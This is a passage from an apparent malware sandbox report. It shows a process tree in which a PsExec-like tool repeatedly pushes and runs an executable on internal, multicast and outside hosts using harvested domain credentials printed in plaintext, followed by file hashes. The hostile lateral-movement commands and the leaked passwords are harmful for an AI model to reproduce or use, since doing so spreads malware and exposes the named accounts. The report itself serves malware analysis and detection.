          • C:\Users\Admin\AppData\Local\Temp\_her.exe
            C:\Users\Admin\AppData\Local\Temp\_her.exe \\igmp.mcast.net -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
            2⤵
              PID:1608
            • C:\Users\Admin\AppData\Local\Temp\_her.exe
              C:\Users\Admin\AppData\Local\Temp\_her.exe \\10.127.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
              2⤵
              • System Location Discovery: System Language Discovery
              PID:2872
            • C:\Users\Admin\AppData\Local\Temp\_her.exe
              C:\Users\Admin\AppData\Local\Temp\_her.exe \\10.127.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
              2⤵
              • System Location Discovery: System Language Discovery
              PID:1768
            • C:\Users\Admin\AppData\Local\Temp\_her.exe
              C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.22 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
              2⤵
                PID:372
              • C:\Users\Admin\AppData\Local\Temp\_her.exe
                C:\Users\Admin\AppData\Local\Temp\_her.exe \\239.255.255.250 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:268
              • C:\Users\Admin\AppData\Local\Temp\_her.exe
                C:\Users\Admin\AppData\Local\Temp\_her.exe \\239.255.255.250 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                2⤵
                  PID:424
                • C:\Users\Admin\AppData\Local\Temp\_her.exe
                  C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.252 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                  2⤵
                    PID:4476
                  • C:\Users\Admin\AppData\Local\Temp\_her.exe
                    C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.252 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:2536
                  • C:\Users\Admin\AppData\Local\Temp\_her.exe
                    C:\Users\Admin\AppData\Local\Temp\_her.exe \\239.255.255.250 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                    2⤵
                      PID:448
                    • C:\Users\Admin\AppData\Local\Temp\_her.exe
                      C:\Users\Admin\AppData\Local\Temp\_her.exe \\10.127.255.255 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:5092
                    • C:\Users\Admin\AppData\Local\Temp\_her.exe
                      C:\Users\Admin\AppData\Local\Temp\_her.exe \\239.255.255.250 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                      2⤵
                        PID:3944
                      • C:\Users\Admin\AppData\Local\Temp\_her.exe
                        C:\Users\Admin\AppData\Local\Temp\_her.exe \\10.127.255.255 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:2224
                      • C:\Users\Admin\AppData\Local\Temp\_her.exe
                        C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.252 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                        2⤵
                          PID:4436
                        • C:\Users\Admin\AppData\Local\Temp\_her.exe
                          C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.252 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                          2⤵
                            PID:4688
                          • C:\Users\Admin\AppData\Local\Temp\_her.exe
                            C:\Users\Admin\AppData\Local\Temp\_her.exe \\10.127.0.1 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                            2⤵
                              PID:272
                            • C:\Users\Admin\AppData\Local\Temp\_her.exe
                              C:\Users\Admin\AppData\Local\Temp\_her.exe \\239.255.255.250 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:1076
                            • C:\Users\Admin\AppData\Local\Temp\_her.exe
                              C:\Users\Admin\AppData\Local\Temp\_her.exe \\239.255.255.250 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:332
                            • C:\Users\Admin\AppData\Local\Temp\_her.exe
                              C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.252 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:5036
                            • C:\Users\Admin\AppData\Local\Temp\_her.exe
                              C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.252 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:1876
                            • C:\Users\Admin\AppData\Local\Temp\_her.exe
                              C:\Users\Admin\AppData\Local\Temp\_her.exe \\239.255.255.250 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                              2⤵
                                PID:1264
                              • C:\Users\Admin\AppData\Local\Temp\_her.exe
                                C:\Users\Admin\AppData\Local\Temp\_her.exe \\239.255.255.250 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:1148
                              • C:\Users\Admin\AppData\Local\Temp\_her.exe
                                C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.252 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:4828
                              • C:\Users\Admin\AppData\Local\Temp\_her.exe
                                C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.252 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:2556
                              • C:\Users\Admin\AppData\Local\Temp\_her.exe
                                C:\Users\Admin\AppData\Local\Temp\_her.exe \\239.255.255.250 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:2760
                              • C:\Users\Admin\AppData\Local\Temp\_her.exe
                                C:\Users\Admin\AppData\Local\Temp\_her.exe \\239.255.255.250 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:3356
                              • C:\Users\Admin\AppData\Local\Temp\_her.exe
                                C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.252 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:3396
                              • C:\Users\Admin\AppData\Local\Temp\_her.exe
                                C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.252 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                                2⤵
                                  PID:1164
                                • C:\Users\Admin\AppData\Local\Temp\_her.exe
                                  C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.252 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                                  2⤵
                                    PID:2820
                                  • C:\Users\Admin\AppData\Local\Temp\_her.exe
                                    C:\Users\Admin\AppData\Local\Temp\_her.exe \\224.0.0.252 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3376
                                  • C:\Users\Admin\AppData\Local\Temp\_her.exe
                                    C:\Users\Admin\AppData\Local\Temp\_her.exe \\136.243.76.170 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2236
                                  • C:\Users\Admin\AppData\Local\Temp\_her.exe
                                    C:\Users\Admin\AppData\Local\Temp\_her.exe \\10.127.0.1 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:5040
                                  • C:\Users\Admin\AppData\Local\Temp\_her.exe
                                    C:\Users\Admin\AppData\Local\Temp\_her.exe \\static.170.76.243.136.clients.your-server.de -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                                    2⤵
                                      PID:4016
                                    • C:\Users\Admin\AppData\Local\Temp\_her.exe
                                      C:\Users\Admin\AppData\Local\Temp\_her.exe \\10.127.0.1 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_jii.exe"
                                      2⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3252
                                  • C:\Windows\system32\vssvc.exe
                                    C:\Windows\system32\vssvc.exe
                                    1⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3336
                                  • C:\Windows\system32\wbengine.exe
                                    "C:\Windows\system32\wbengine.exe"
                                    1⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2496
                                  • C:\Windows\System32\vdsldr.exe
                                    C:\Windows\System32\vdsldr.exe -Embedding
                                    1⤵
                                      PID:4944
                                    • C:\Windows\System32\vds.exe
                                      C:\Windows\System32\vds.exe
                                      1⤵
                                      • Checks SCSI registry key(s)
                                      PID:1920

                                    Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\AppData\Local\Temp\_her.exe

                                      Filesize

                                      331KB

                                      MD5

                                      27304b246c7d5b4e149124d5f93c5b01

                                      SHA1

                                      e50d9e3bd91908e13a26b3e23edeaf577fb3a095

                                      SHA256

                                      3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

                                      SHA512

                                      bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

                                    • C:\Users\Admin\AppData\Local\Temp\_lvd.exe

                                      Filesize

                                      36KB

                                      MD5

                                      3c0d740347b0362331c882c2dee96dbf

                                      SHA1

                                      8350e06f52e5c660bb416b03edb6a5ddc50c3a59

                                      SHA256

                                      ae9a4e244a9b3c77d489dee8aeaf35a7c3ba31b210e76d81ef2e91790f052c85

                                      SHA512

                                      a701f94b9cdebce6eff2f82552ec7554bf10d99019f8bcd6871ebca804d7519bdcfa3806ac7c7d8e604c3259c61c58b905293fa641c092a8fca8245f91eb0f8f

                                    • C:\Users\Admin\AppData\Local\Temp\rdqwf.exe

                                      Filesize

                                      751KB

                                      MD5

                                      68970b2cd5430c812bef5b87c1add6ea

                                      SHA1

                                      7695d829965b802c50d96a19dbc2fc361169624d

                                      SHA256

                                      e4e1e3c44e01c60fd433c6283bd8cd15a9941e1cbaad72e6409cc92e2e91263e

                                      SHA512

                                      1ea13dfb60cdca0338bb20a50419901a12387db2253c5d6ae3b6939c803e6f1e7998b7ba443c7472a931e64df94521cb6c6c3f646b01d5e671acb103d0a64475

                                    • C:\Users\Admin\AppData\Local\Temp\wgaxl.exe

                                      Filesize

                                      277KB

                                      MD5

                                      86d1a184850859a6a4d1c35982f3c40e

                                      SHA1

                                      4abde6ff4d7f30c60dc61e866c4a11a7eee5bef5

                                      SHA256

                                      eb766983a8a05ad16b15e356df43f4e00f36092b8c6effdff3a580c2de2bba8f

                                      SHA512

                                      e9c18e0a70af00119bef1c697f0a801e9942c4702046d7f20533ea33c987c37c2007066b13935c8df6e039628db885cad2338feb95490e27cdcdbd57a7d0cc1a

                                    • memory/2196-17-0x0000000180000000-0x000000018002B000-memory.dmp

                                      Filesize

                                      172KB

                                    • memory/4804-4-0x0000000010000000-0x00000000100AA000-memory.dmp

                                      Filesize

                                      680KB